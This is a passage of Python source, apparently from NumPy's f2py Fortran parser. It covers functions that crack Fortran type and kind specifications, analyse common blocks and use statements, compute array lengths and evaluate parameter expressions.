m2 = re.match(
r'\A\s*(?P<local>\b[\w]+\b)\s*=\s*>\s*(?P<use>\b[\w]+\b)\s*\Z', l, re.I)
if m2:
rl[m2.group('local').strip()] = m2.group(
'use').strip()
else:
outmess(
'analyzeline: Not local=>use pattern found in %s\n' % repr(l))
else:
rl[l] = l
groupcache[groupcounter]['use'][name]['map'] = rl
else:
pass
else:
print(m.groupdict())
outmess('analyzeline: Could not crack the use statement.\n')
elif case in ['f2pyenhancements']:
if 'f2pyenhancements' not in groupcache[groupcounter]:
groupcache[groupcounter]['f2pyenhancements'] = {}
d = groupcache[groupcounter]['f2pyenhancements']
if m.group('this') == 'usercode' and 'usercode' in d:
if isinstance(d['usercode'], str):
d['usercode'] = [d['usercode']]
d['usercode'].append(m.group('after'))
else:
d[m.group('this')] = m.group('after')
elif case == 'multiline':
if previous_context is None:
if verbose:
outmess('analyzeline: No context for multiline block.\n')
return
gc = groupcounter
appendmultiline(groupcache[gc],
previous_context[:2],
m.group('this'))
else:
if verbose > 1:
print(m.groupdict())
outmess('analyzeline: No code implemented for line.\n')
def appendmultiline(group, context_name, ml):
if 'f2pymultilines' not in group:
group['f2pymultilines'] = {}
d = group['f2pymultilines']
if context_name not in d:
d[context_name] = []
d[context_name].append(ml)
return
def cracktypespec0(typespec, ll):
selector = None
attr = None
if re.match(r'double\s*complex', typespec, re.I):
typespec = 'double complex'
elif re.match(r'double\s*precision', typespec, re.I):
typespec = 'double precision'
else:
typespec = typespec.strip().lower()
m1 = selectpattern.match(markouterparen(ll))
if not m1:
outmess(
'cracktypespec0: no kind/char_selector pattern found for line.\n')
return
d = m1.groupdict()
for k in list(d.keys()):
d[k] = unmarkouterparen(d[k])
if typespec in ['complex', 'integer', 'logical', 'real', 'character', 'type']:
selector = d['this']
ll = d['after']
i = ll.find('::')
if i >= 0:
attr = ll[:i].strip()
ll = ll[i + 2:]
return typespec, selector, attr, ll
#####
namepattern = re.compile(r'\s*(?P<name>\b[\w]+\b)\s*(?P<after>.*)\s*\Z', re.I)
kindselector = re.compile(
r'\s*(\(\s*(kind\s*=)?\s*(?P<kind>.*)\s*\)|[*]\s*(?P<kind2>.*?))\s*\Z', re.I)
charselector = re.compile(
r'\s*(\((?P<lenkind>.*)\)|[*]\s*(?P<charlen>.*))\s*\Z', re.I)
lenkindpattern = re.compile(
r'\s*(kind\s*=\s*(?P<kind>.*?)\s*(@,@\s*len\s*=\s*(?P<len>.*)|)|(len\s*=\s*|)(?P<len2>.*?)\s*(@,@\s*(kind\s*=\s*|)(?P<kind2>.*)|))\s*\Z', re.I)
lenarraypattern = re.compile(
r'\s*(@\(@\s*(?!/)\s*(?P<array>.*?)\s*@\)@\s*[*]\s*(?P<len>.*?)|([*]\s*(?P<len2>.*?)|)\s*(@\(@\s*(?!/)\s*(?P<array2>.*?)\s*@\)@|))\s*(=\s*(?P<init>.*?)|(@\(@|)/\s*(?P<init2>.*?)\s*/(@\)@|)|)\s*\Z', re.I)
def removespaces(expr):
expr = expr.strip()
if len(expr) <= 1:
return expr
expr2 = expr[0]
for i in range(1, len(expr) - 1):
if (expr[i] == ' ' and
((expr[i + 1] in "()[]{}=+-/* ") or
(expr[i - 1] in "()[]{}=+-/* "))):
continue
expr2 = expr2 + expr[i]
expr2 = expr2 + expr[-1]
return expr2
def markinnerspaces(line):
l = ''
f = 0
cc = '\''
cb = ''
for c in line:
if cb == '\\' and c in ['\\', '\'', '"']:
l = l + c
cb = c
continue
if f == 0 and c in ['\'', '"']:
cc = c
if c == cc:
f = f + 1
elif c == cc:
f = f - 1
elif c == ' ' and f == 1:
l = l + '@_@'
continue
l = l + c
cb = c
return l
def updatevars(typespec, selector, attrspec, entitydecl):
global groupcache, groupcounter
last_name = None
kindselect, charselect, typename = cracktypespec(typespec, selector)
if attrspec:
attrspec = [x.strip() for x in markoutercomma(attrspec).split('@,@')]
l = []
c = re.compile(r'(?P<start>[a-zA-Z]+)')
for a in attrspec:
if not a:
continue
m = c.match(a)
if m:
s = m.group('start').lower()
a = s + a[len(s):]
l.append(a)
attrspec = l
el = [x.strip() for x in markoutercomma(entitydecl).split('@,@')]
el1 = []
for e in el:
for e1 in [x.strip() for x in markoutercomma(removespaces(markinnerspaces(e)), comma=' ').split('@ @')]:
if e1:
el1.append(e1.replace('@_@', ' '))
for e in el1:
m = namepattern.match(e)
if not m:
outmess(
'updatevars: no name pattern found for entity=%s. Skipping.\n' % (repr(e)))
continue
ename = rmbadname1(m.group('name'))
edecl = {}
if ename in groupcache[groupcounter]['vars']:
edecl = groupcache[groupcounter]['vars'][ename].copy()
not_has_typespec = 'typespec' not in edecl
if not_has_typespec:
edecl['typespec'] = typespec
elif typespec and (not typespec == edecl['typespec']):
outmess('updatevars: attempt to change the type of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typespec'], typespec))
if 'kindselector' not in edecl:
edecl['kindselector'] = copy.copy(kindselect)
elif kindselect:
for k in list(kindselect.keys()):
if k in edecl['kindselector'] and (not kindselect[k] == edecl['kindselector'][k]):
outmess('updatevars: attempt to change the kindselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['kindselector'][k], kindselect[k]))
else:
edecl['kindselector'][k] = copy.copy(kindselect[k])
if 'charselector' not in edecl and charselect:
if not_has_typespec:
edecl['charselector'] = charselect
else:
errmess('updatevars:%s: attempt to change empty charselector to %r. Ignoring.\n'
% (ename, charselect))
elif charselect:
for k in list(charselect.keys()):
if k in edecl['charselector'] and (not charselect[k] == edecl['charselector'][k]):
outmess('updatevars: attempt to change the charselector "%s" of "%s" ("%s") to "%s". Ignoring.\n' % (
k, ename, edecl['charselector'][k], charselect[k]))
else:
edecl['charselector'][k] = copy.copy(charselect[k])
if 'typename' not in edecl:
edecl['typename'] = typename
elif typename and (not edecl['typename'] == typename):
outmess('updatevars: attempt to change the typename of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['typename'], typename))
if 'attrspec' not in edecl:
edecl['attrspec'] = copy.copy(attrspec)
elif attrspec:
for a in attrspec:
if a not in edecl['attrspec']:
edecl['attrspec'].append(a)
else:
edecl['typespec'] = copy.copy(typespec)
edecl['kindselector'] = copy.copy(kindselect)
edecl['charselector'] = copy.copy(charselect)
edecl['typename'] = typename
edecl['attrspec'] = copy.copy(attrspec)
if m.group('after'):
m1 = lenarraypattern.match(markouterparen(m.group('after')))
if m1:
d1 = m1.groupdict()
for lk in ['len', 'array', 'init']:
if d1[lk + '2'] is not None:
d1[lk] = d1[lk + '2']
del d1[lk + '2']
for k in list(d1.keys()):
if d1[k] is not None:
d1[k] = unmarkouterparen(d1[k])
else:
del d1[k]
if 'len' in d1 and 'array' in d1:
if d1['len'] == '':
d1['len'] = d1['array']
del d1['array']
else:
d1['array'] = d1['array'] + ',' + d1['len']
del d1['len']
errmess('updatevars: "%s %s" is mapped to "%s %s(%s)"\n' % (
typespec, e, typespec, ename, d1['array']))
if 'array' in d1:
dm = 'dimension(%s)' % d1['array']
if 'attrspec' not in edecl or (not edecl['attrspec']):
edecl['attrspec'] = [dm]
else:
edecl['attrspec'].append(dm)
for dm1 in edecl['attrspec']:
if dm1[:9] == 'dimension' and dm1 != dm:
del edecl['attrspec'][-1]
errmess('updatevars:%s: attempt to change %r to %r. Ignoring.\n'
% (ename, dm1, dm))
break
if 'len' in d1:
if typespec in ['complex', 'integer', 'logical', 'real']:
if ('kindselector' not in edecl) or (not edecl['kindselector']):
edecl['kindselector'] = {}
edecl['kindselector']['*'] = d1['len']
elif typespec == 'character':
if ('charselector' not in edecl) or (not edecl['charselector']):
edecl['charselector'] = {}
if 'len' in edecl['charselector']:
del edecl['charselector']['len']
edecl['charselector']['*'] = d1['len']
if 'init' in d1:
if '=' in edecl and (not edecl['='] == d1['init']):
outmess('updatevars: attempt to change the init expression of "%s" ("%s") to "%s". Ignoring.\n' % (
ename, edecl['='], d1['init']))
else:
edecl['='] = d1['init']
else:
outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n' % (
ename + m.group('after')))
for k in list(edecl.keys()):
if not edecl[k]:
del edecl[k]
groupcache[groupcounter]['vars'][ename] = edecl
if 'varnames' in groupcache[groupcounter]:
groupcache[groupcounter]['varnames'].append(ename)
last_name = ename
return last_name
def cracktypespec(typespec, selector):
kindselect = None
charselect = None
typename = None
if selector:
if typespec in ['complex', 'integer', 'logical', 'real']:
kindselect = kindselector.match(selector)
if not kindselect:
outmess(
'cracktypespec: no kindselector pattern found for %s\n' % (repr(selector)))
return
kindselect = kindselect.groupdict()
kindselect['*'] = kindselect['kind2']
del kindselect['kind2']
for k in list(kindselect.keys()):
if not kindselect[k]:
del kindselect[k]
for k, i in list(kindselect.items()):
kindselect[k] = rmbadname1(i)
elif typespec == 'character':
charselect = charselector.match(selector)
if not charselect:
outmess(
'cracktypespec: no charselector pattern found for %s\n' % (repr(selector)))
return
charselect = charselect.groupdict()
charselect['*'] = charselect['charlen']
del charselect['charlen']
if charselect['lenkind']:
lenkind = lenkindpattern.match(
markoutercomma(charselect['lenkind']))
lenkind = lenkind.groupdict()
for lk in ['len', 'kind']:
if lenkind[lk + '2']:
lenkind[lk] = lenkind[lk + '2']
charselect[lk] = lenkind[lk]
del lenkind[lk + '2']
del charselect['lenkind']
for k in list(charselect.keys()):
if not charselect[k]:
del charselect[k]
for k, i in list(charselect.items()):
charselect[k] = rmbadname1(i)
elif typespec == 'type':
typename = re.match(r'\s*\(\s*(?P<name>\w+)\s*\)', selector, re.I)
if typename:
typename = typename.group('name')
else:
outmess('cracktypespec: no typename found in %s\n' %
(repr(typespec + selector)))
else:
outmess('cracktypespec: no selector used for %s\n' %
(repr(selector)))
return kindselect, charselect, typename
######
def setattrspec(decl, attr, force=0):
if not decl:
decl = {}
if not attr:
return decl
if 'attrspec' not in decl:
decl['attrspec'] = [attr]
return decl
if force:
decl['attrspec'].append(attr)
if attr in decl['attrspec']:
return decl
if attr == 'static' and 'automatic' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'automatic' and 'static' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'public':
if 'private' not in decl['attrspec']:
decl['attrspec'].append(attr)
elif attr == 'private':
if 'public' not in decl['attrspec']:
decl['attrspec'].append(attr)
else:
decl['attrspec'].append(attr)
return decl
def setkindselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'kindselector' not in decl:
decl['kindselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['kindselector']:
decl['kindselector'][k] = sel[k]
return decl
def setcharselector(decl, sel, force=0):
if not decl:
decl = {}
if not sel:
return decl
if 'charselector' not in decl:
decl['charselector'] = sel
return decl
for k in list(sel.keys()):
if force or k not in decl['charselector']:
decl['charselector'][k] = sel[k]
return decl
def getblockname(block, unknown='unknown'):
if 'name' in block:
return block['name']
return unknown
# post processing
def setmesstext(block):
global filepositiontext
try:
filepositiontext = 'In: %s:%s\n' % (block['from'], block['name'])
except Exception:
pass
def get_usedict(block):
usedict = {}
if 'parent_block' in block:
usedict = get_usedict(block['parent_block'])
if 'use' in block:
usedict.update(block['use'])
return usedict
def get_useparameters(block, param_map=None):
global f90modulevars
if param_map is None:
param_map = {}
usedict = get_usedict(block)
if not usedict:
return param_map
for usename, mapping in list(usedict.items()):
usename = usename.lower()
if usename not in f90modulevars:
outmess('get_useparameters: no module %s info used by %s\n' %
(usename, block.get('name')))
continue
mvars = f90modulevars[usename]
params = get_parameters(mvars)
if not params:
continue
# XXX: apply mapping
if mapping:
errmess('get_useparameters: mapping for %s not impl.' % (mapping))
for k, v in list(params.items()):
if k in param_map:
outmess('get_useparameters: overriding parameter %s with'
' value from module %s' % (repr(k), repr(usename)))
param_map[k] = v
return param_map
def postcrack2(block, tab='', param_map=None):
global f90modulevars
if not f90modulevars:
return block
if isinstance(block, list):
ret = [postcrack2(g, tab=tab + '\t', param_map=param_map)
for g in block]
return ret
setmesstext(block)
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
if param_map is None:
param_map = get_useparameters(block)
if param_map is not None and 'vars' in block:
vars = block['vars']
for n in list(vars.keys()):
var = vars[n]
if 'kindselector' in var:
kind = var['kindselector']
if 'kind' in kind:
val = kind['kind']
if val in param_map:
kind['kind'] = param_map[val]
new_body = [postcrack2(b, tab=tab + '\t', param_map=param_map)
for b in block['body']]
block['body'] = new_body
return block
def postcrack(block, args=None, tab=''):
"""
TODO:
function return values
determine expression types if in argument list
"""
global usermodules, onlyfunctions
if isinstance(block, list):
gret = []
uret = []
for g in block:
setmesstext(g)
g = postcrack(g, tab=tab + '\t')
# sort user routines to appear first
if 'name' in g and '__user__' in g['name']:
uret.append(g)
else:
gret.append(g)
return uret + gret
setmesstext(block)
if not isinstance(block, dict) and 'block' not in block:
raise Exception('postcrack: Expected block dictionary instead of ' +
str(block))
if 'name' in block and not block['name'] == 'unknown_interface':
outmess('%sBlock: %s\n' % (tab, block['name']), 0)
block = analyzeargs(block)
block = analyzecommon(block)
block['vars'] = analyzevars(block)
block['sortvars'] = sortvarnames(block['vars'])
if 'args' in block and block['args']:
args = block['args']
block['body'] = analyzebody(block, args, tab=tab)
userisdefined = []
if 'use' in block:
useblock = block['use']
for k in list(useblock.keys()):
if '__user__' in k:
userisdefined.append(k)
else:
useblock = {}
name = ''
if 'name' in block:
name = block['name']
# and not userisdefined: # Build a __user__ module
if 'externals' in block and block['externals']:
interfaced = []
if 'interfaced' in block:
interfaced = block['interfaced']
mvars = copy.copy(block['vars'])
if name:
mname = name + '__user__routines'
else:
mname = 'unknown__user__routines'
if mname in userisdefined:
i = 1
while '%s_%i' % (mname, i) in userisdefined:
i = i + 1
mname = '%s_%i' % (mname, i)
interface = {'block': 'interface', 'body': [],
'vars': {}, 'name': name + '_user_interface'}
for e in block['externals']:
if e in interfaced:
edef = []
j = -1
for b in block['body']:
j = j + 1
if b['block'] == 'interface':
i = -1
for bb in b['body']:
i = i + 1
if 'name' in bb and bb['name'] == e:
edef = copy.copy(bb)
del b['body'][i]
break
if edef:
if not b['body']:
del block['body'][j]
del interfaced[interfaced.index(e)]
break
interface['body'].append(edef)
else:
if e in mvars and not isexternal(mvars[e]):
interface['vars'][e] = mvars[e]
if interface['vars'] or interface['body']:
block['interfaced'] = interfaced
mblock = {'block': 'python module', 'body': [
interface], 'vars': {}, 'name': mname, 'interfaced': block['externals']}
useblock[mname] = {}
usermodules.append(mblock)
if useblock:
block['use'] = useblock
return block
def sortvarnames(vars):
indep = []
dep = []
for v in list(vars.keys()):
if 'depend' in vars[v] and vars[v]['depend']:
dep.append(v)
else:
indep.append(v)
n = len(dep)
i = 0
while dep: # XXX: How to catch dependence cycles correctly?
v = dep[0]
fl = 0
for w in dep[1:]:
if w in vars[v]['depend']:
fl = 1
break
if fl:
dep = dep[1:] + [v]
i = i + 1
if i > n:
errmess('sortvarnames: failed to compute dependencies because'
' of cyclic dependencies between '
+ ', '.join(dep) + '\n')
indep = indep + dep
break
else:
indep.append(v)
dep = dep[1:]
n = len(dep)
i = 0
return indep
def analyzecommon(block):
if not hascommon(block):
return block
commonvars = []
for k in list(block['common'].keys()):
comvars = []
for e in block['common'][k]:
m = re.match(
r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z', e, re.I)
if m:
dims = []
if m.group('dims'):
dims = [x.strip()
for x in markoutercomma(m.group('dims')).split('@,@')]
n = rmbadname1(m.group('name').strip())
if n in block['vars']:
if 'attrspec' in block['vars'][n]:
block['vars'][n]['attrspec'].append(
'dimension(%s)' % (','.join(dims)))
else:
block['vars'][n]['attrspec'] = [
'dimension(%s)' % (','.join(dims))]
else:
if dims:
block['vars'][n] = {
'attrspec': ['dimension(%s)' % (','.join(dims))]}
else:
block['vars'][n] = {}
if n not in commonvars:
commonvars.append(n)
else:
n = e
errmess(
'analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n' % (e, k))
comvars.append(n)
block['common'][k] = comvars
if 'commonvars' not in block:
block['commonvars'] = commonvars
else:
block['commonvars'] = block['commonvars'] + commonvars
return block
def analyzebody(block, args, tab=''):
global usermodules, skipfuncs, onlyfuncs, f90modulevars
setmesstext(block)
body = []
for b in block['body']:
b['parent_block'] = block
if b['block'] in ['function', 'subroutine']:
if args is not None and b['name'] not in args:
continue
else:
as_ = b['args']
if b['name'] in skipfuncs:
continue
if onlyfuncs and b['name'] not in onlyfuncs:
continue
b['saved_interface'] = crack2fortrangen(
b, '\n' + ' ' * 6, as_interface=True)
else:
as_ = args
b = postcrack(b, as_, tab=tab + '\t')
if b['block'] == 'interface' and not b['body']:
if 'f2pyenhancements' not in b:
continue
if b['block'].replace(' ', '') == 'pythonmodule':
usermodules.append(b)
else:
if b['block'] == 'module':
f90modulevars[b['name']] = b['vars']
body.append(b)
return body
def buildimplicitrules(block):
setmesstext(block)
implicitrules = defaultimplicitrules
attrrules = {}
if 'implicit' in block:
if block['implicit'] is None:
implicitrules = None
if verbose > 1:
outmess(
'buildimplicitrules: no implicit rules for routine %s.\n' % repr(block['name']))
else:
for k in list(block['implicit'].keys()):
if block['implicit'][k].get('typespec') not in ['static', 'automatic']:
implicitrules[k] = block['implicit'][k]
else:
attrrules[k] = block['implicit'][k]['typespec']
return implicitrules, attrrules
def myeval(e, g=None, l=None):
""" Like `eval` but returns only integers and floats """
r = eval(e, g, l)
if type(r) in [int, float]:
return r
raise ValueError('r=%r' % (r))
getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z', re.I)
def getlincoef(e, xset): # e = a*x+b ; x in xset
"""
Obtain ``a`` and ``b`` when ``e == "a*x+b"``, where ``x`` is a symbol in
xset.
>>> getlincoef('2*x + 1', {'x'})
(2, 1, 'x')
>>> getlincoef('3*x + x*2 + 2 + 1', {'x'})
(5, 3, 'x')
>>> getlincoef('0', {'x'})
(0, 0, None)
>>> getlincoef('0*x', {'x'})
(0, 0, 'x')
>>> getlincoef('x*x', {'x'})
(None, None, None)
This can be tricked by sufficiently complex expressions
>>> getlincoef('(x - 0.5)*(x - 1.5)*(x - 1)*x + 2*x + 3', {'x'})
(2.0, 3.0, 'x')
"""
try:
c = int(myeval(e, {}, {}))
return 0, c, None
except Exception:
pass
if getlincoef_re_1.match(e):
return 1, 0, e
len_e = len(e)
for x in xset:
if len(x) > len_e:
continue
if re.search(r'\w\s*\([^)]*\b' + x + r'\b', e):
# skip function calls having x as an argument, e.g max(1, x)
continue
re_1 = re.compile(r'(?P<before>.*?)\b' + x + r'\b(?P<after>.*)', re.I)
m = re_1.match(e)
if m:
try:
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0, m1.group('after'))
m1 = re_1.match(ee)
b = myeval(ee, {}, {})
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1, m1.group('after'))
m1 = re_1.match(ee)
a = myeval(ee, {}, {}) - b
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 0.5, m1.group('after'))
m1 = re_1.match(ee)
c = myeval(ee, {}, {})
# computing another point to be sure that expression is linear
m1 = re_1.match(e)
while m1:
ee = '%s(%s)%s' % (
m1.group('before'), 1.5, m1.group('after'))
m1 = re_1.match(ee)
c2 = myeval(ee, {}, {})
if (a * 0.5 + b == c and a * 1.5 + b == c2):
# gh-8062: return integers instead of floats if possible.
try:
a = int(a)
except:
pass
try:
b = int(b)
except:
pass
return a, b, x
except Exception:
pass
break
return None, None, None
_varname_match = re.compile(r'\A[a-z]\w*\Z').match
def getarrlen(dl, args, star='*'):
"""
Parameters
----------
dl : sequence of two str objects
dimensions of the array
args : Iterable[str]
symbols used in the expression
star : Any
unused
Returns
-------
expr : str
Some numeric expression as a string
arg : Optional[str]
If understood, the argument from `args` present in `expr`
expr2 : Optional[str]
If understood, an expression fragment that should be used as
``"(%s%s".format(something, expr2)``.
Examples
--------
>>> getarrlen(['10*x + 20', '40*x'], {'x'})
('30 * x - 19', 'x', '+19)/(30)')
>>> getarrlen(['1', '10*x + 20'], {'x'})
('10 * x + 20', 'x', '-20)/(10)')
>>> getarrlen(['10*x + 20', '1'], {'x'})
('-10 * x - 18', 'x', '+18)/(-10)')
>>> getarrlen(['20', '1'], {'x'})
('-18', None, None)
"""
edl = []
try:
edl.append(myeval(dl[0], {}, {}))
except Exception:
edl.append(dl[0])
try:
edl.append(myeval(dl[1], {}, {}))
except Exception:
edl.append(dl[1])
if isinstance(edl[0], int):
p1 = 1 - edl[0]
if p1 == 0:
d = str(dl[1])
elif p1 < 0:
d = '%s-%s' % (dl[1], -p1)
else:
d = '%s+%s' % (dl[1], p1)
elif isinstance(edl[1], int):
p1 = 1 + edl[1]
if p1 == 0:
d = '-(%s)' % (dl[0])
else:
d = '%s-(%s)' % (p1, dl[0])
else:
d = '%s-(%s)+1' % (dl[1], dl[0])
try:
return repr(myeval(d, {}, {})), None, None
except Exception:
pass
d1, d2 = getlincoef(dl[0], args), getlincoef(dl[1], args)
if None not in [d1[0], d2[0]]:
if (d1[0], d2[0]) == (0, 0):
return repr(d2[1] - d1[1] + 1), None, None
b = d2[1] - d1[1] + 1
d1 = (d1[0], 0, d1[2])
d2 = (d2[0], b, d2[2])
if d1[0] == 0 and d2[2] in args:
if b < 0:
return '%s * %s - %s' % (d2[0], d2[2], -b), d2[2], '+%s)/(%s)' % (-b, d2[0])
elif b:
return '%s * %s + %s' % (d2[0], d2[2], b), d2[2], '-%s)/(%s)' % (b, d2[0])
else:
return '%s * %s' % (d2[0], d2[2]), d2[2], ')/(%s)' % (d2[0])
if d2[0] == 0 and d1[2] in args:
if b < 0:
return '%s * %s - %s' % (-d1[0], d1[2], -b), d1[2], '+%s)/(%s)' % (-b, -d1[0])
elif b:
return '%s * %s + %s' % (-d1[0], d1[2], b), d1[2], '-%s)/(%s)' % (b, -d1[0])
else:
return '%s * %s' % (-d1[0], d1[2]), d1[2], ')/(%s)' % (-d1[0])
if d1[2] == d2[2] and d1[2] in args:
a = d2[0] - d1[0]
if not a:
return repr(b), None, None
if b < 0:
return '%s * %s - %s' % (a, d1[2], -b), d2[2], '+%s)/(%s)' % (-b, a)
elif b:
return '%s * %s + %s' % (a, d1[2], b), d2[2], '-%s)/(%s)' % (b, a)
else:
return '%s * %s' % (a, d1[2]), d2[2], ')/(%s)' % (a)
if d1[0] == d2[0] == 1:
c = str(d1[2])
if c not in args:
if _varname_match(c):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c))
c = '(%s)' % c
if b == 0:
d = '%s-%s' % (d2[2], c)
elif b < 0:
d = '%s-%s-%s' % (d2[2], c, -b)
else:
d = '%s-%s+%s' % (d2[2], c, b)
elif d1[0] == 0:
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = c2
elif b < 0:
d = '%s-%s' % (c2, -b)
else:
d = '%s+%s' % (c2, b)
elif d2[0] == 0:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
if b == 0:
d = c1
elif b < 0:
d = '%s-%s' % (c1, -b)
else:
d = '%s+%s' % (c1, b)
else:
c1 = str(d1[2])
if c1 not in args:
if _varname_match(c1):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c1))
c1 = '(%s)' % c1
if d1[0] == 1:
c1 = '-%s' % c1
elif d1[0] == -1:
c1 = '+%s' % c1
elif d1[0] < 0:
c1 = '+%s*%s' % (-d1[0], c1)
else:
c1 = '-%s*%s' % (d1[0], c1)
c2 = str(d2[2])
if c2 not in args:
if _varname_match(c2):
outmess('\tgetarrlen:variable "%s" undefined\n' % (c2))
c2 = '(%s)' % c2
if d2[0] == 1:
pass
elif d2[0] == -1:
c2 = '-%s' % c2
else:
c2 = '%s*%s' % (d2[0], c2)
if b == 0:
d = '%s%s' % (c2, c1)
elif b < 0:
d = '%s%s-%s' % (c2, c1, -b)
else:
d = '%s%s+%s' % (c2, c1, b)
return d, None, None
word_pattern = re.compile(r'\b[a-z][\w$]*\b', re.I)
def _get_depend_dict(name, vars, deps):
if name in vars:
words = vars[name].get('depend', [])
if '=' in vars[name] and not isstring(vars[name]):
for word in word_pattern.findall(vars[name]['=']):
if word not in words and word in vars:
words.append(word)
for word in words[:]:
for w in deps.get(word, []) \
or _get_depend_dict(word, vars, deps):
if w not in words:
words.append(w)
else:
outmess('_get_depend_dict: no dependence info for %s\n' % (repr(name)))
words = []
deps[name] = words
return words
def _calc_depend_dict(vars):
names = list(vars.keys())
depend_dict = {}
for n in names:
_get_depend_dict(n, vars, depend_dict)
return depend_dict
def get_sorted_names(vars):
"""
"""
depend_dict = _calc_depend_dict(vars)
names = []
for name in list(depend_dict.keys()):
if not depend_dict[name]:
names.append(name)
del depend_dict[name]
while depend_dict:
for name, lst in list(depend_dict.items()):
new_lst = [n for n in lst if n in depend_dict]
if not new_lst:
names.append(name)
del depend_dict[name]
else:
depend_dict[name] = new_lst
return [name for name in names if name in vars]
def _kind_func(string):
# XXX: return something sensible.
if string[0] in "'\"":
string = string[1:-1]
if real16pattern.match(string):
return 8
elif real8pattern.match(string):
return 4
return 'kind(' + string + ')'
def _selected_int_kind_func(r):
# XXX: This should be processor dependent
m = 10 ** r
if m <= 2 ** 8:
return 1
if m <= 2 ** 16:
return 2
if m <= 2 ** 32:
return 4
if m <= 2 ** 63:
return 8
if m <= 2 ** 128:
return 16
return -1
def _selected_real_kind_func(p, r=0, radix=0):
# XXX: This should be processor dependent
# This is only good for 0 <= p <= 20
if p < 7:
return 4
if p < 16:
return 8
machine = platform.machine().lower()
if machine.startswith(('aarch64', 'power', 'ppc', 'riscv', 's390x', 'sparc')):
if p <= 20:
return 16
else:
if p < 19:
return 10
elif p <= 20:
return 16
return -1
def get_parameters(vars, global_params={}):
params = copy.copy(global_params)
g_params = copy.copy(global_params)
for name, func in [('kind', _kind_func),
('selected_int_kind', _selected_int_kind_func),
('selected_real_kind', _selected_real_kind_func), ]:
if name not in g_params:
g_params[name] = func
param_names = []
for n in get_sorted_names(vars):
if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']:
param_names.append(n)
kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_int_kind_re = re.compile(
r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
selected_kind_re = re.compile(
r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)', re.I)
for n in param_names:
if '=' in vars[n]:
v = vars[n]['=']
if islogical(vars[n]):
v = v.lower()
for repl in [
('.false.', 'False'),
('.true.', 'True'),
# TODO: test .eq., .neq., etc replacements.
]:
v = v.replace(*repl)
v = kind_re.sub(r'kind("\1")', v)
v = selected_int_kind_re.sub(r'selected_int_kind(\1)', v)
# We need to act according to the data.
# The easy case is if the data has a kind-specifier,
# then we may easily remove those specifiers.
# However, it may be that the user uses other specifiers...(!)
is_replaced = False
if 'kindselector' in vars[n]:
if 'kind' in vars[n]['kindselector']:
orig_v_len = len(v)
v = v.replace('_' + vars[n]['kindselector']['kind'], '')
# Again, this will be true if even a single specifier
# has been replaced, see comment above.
is_replaced = len(v) < orig_v_len
if not is_replaced:
if not selected_kind_re.match(v):
v_ = v.split('_')
# In case there are additive parameters
if len(v_) > 1:
v = ''.join(v_[:-1]).lower().replace(v_[-1].lower(), '')
# Currently this will not work for complex numbers.
# There is missing code for extracting a complex number,
# which may be defined in either of these:
# a) (Re, Im)
# b) cmplx(Re, Im)
# c) dcmplx(Re, Im)
# d) cmplx(Re, Im, <prec>)
if isdouble(vars[n]):
tt = list(v)
for m in real16pattern.finditer(v):
tt[m.start():m.end()] = list(
v[m.start():m.end()].lower().replace('d', 'e'))
v = ''.join(tt)
elif iscomplex(vars[n]):
# FIXME complex numbers may also have exponents
if v[0] == '(' and v[-1] == ')':
# FIXME, unused l looks like potential bug
l = markoutercomma(v[1:-1]).split('@,@')
try:
params[n] = eval(v, g_params, params)
except Exception as msg:
params[n] = v
outmess('get_parameters: got "%s" on %s\n' % (msg, repr(v)))
if isstring(vars[n]) and isinstance(params[n], int):
params[n] = chr(params[n])
nl = n.lower()
if nl != n:
params[nl] = params[n]
else:
print(vars[n])
outmess(
'get_parameters:parameter %s does not have value?!\n' % (repr(n)))
return params
def _eval_length(length, params):
if length in ['(:)', '(*)', '*']:
return '(*)'
return _eval_scalar(length, params)
_is_kind_number = re.compile(r'\d+_').match
def _eval_scalar(value, params):
if _is_kind_number(value):
value = value.split('_')[0]
try:
value = str(eval(value, {}, params))
except (NameError, SyntaxError, TypeError):
return value
except Exception as msg:
errmess('"%s" in evaluating %r '
'(available names: %s)\n'
% (msg, value, list(params.keys())))
return value
def analyzevars(block):
global f90modulevars
setmesstext(block)
implicitrules, attrrules = buildimplicitrules(block)
vars = copy.copy(block['vars'])
if block['block'] == 'function' and block['name'] not in vars:
vars[block['name']] = {}
if '' in block['vars']:
del vars['']
if 'attrspec' in block['vars']['']:
gen = block['vars']['']['attrspec']
for n in list(vars.keys()):
for k in ['public', 'private']:
if k in gen:
vars[n] = setattrspec(vars[n], k)
svars = []
args = block['args']
for a in args:
try:
vars[a]
svars.append(a)
except KeyError:
pass
for n in list(vars.keys()):
if n not in args:
svars.append(n)
